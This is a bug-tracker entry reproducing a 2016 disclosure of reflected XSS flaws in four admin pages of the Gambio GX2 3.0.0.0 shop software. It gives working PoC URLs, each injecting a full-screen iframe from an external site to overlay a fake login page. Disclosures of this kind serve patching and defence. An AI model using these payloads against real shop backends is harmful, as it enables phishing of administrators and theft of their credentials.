Projekt

Allgemein

Profil

GX-Bug #47150

Von Daniel Würdemann vor mehr als 8 Jahren aktualisiert

Title: Multiple XSS (possible authenticated backend phishing attack) 

 Software: Gambio GX2  
 Version: 3.0.0.0 
 Vendor: Gambio GmbH (www.gambio.de) 
 Date: 23/06/2016 
 Credits / Author: Heiko Frenzel (www.heiko-frenzel.de) 

 Description: 
 Gambio GX2 3.0.0.0 is vulnerable to XSS attacks meaning that if an admin user can be tricked to visit a crafted URL created by attacker, the attacker is able to use phishing methods (fake login form via iframe / external content) or could compromise the admin computer by using exploits.  
 ____________________________________________________________ 
 ____________________________________________________________ 



 1. XSS 
 `Exploit: HOST/admin/customers.php?xss=[XSS] 
 PoC: HOST/admin/customers.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

 2. XSS 
 `Exploit: HOST/admin/categories.php?xss=[XSS] 
 PoC: HOST/admin/categories.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

 3. XSS 
 `Exploit: HOST/admin/specials.php?xss=[XSS] 
 PoC: HOST/admin/specials.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

 4. XSS 
 `Exploit: HOST/admin/orders.php?xss=[XSS] 
 PoC: HOST/admin/orders.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

Zurück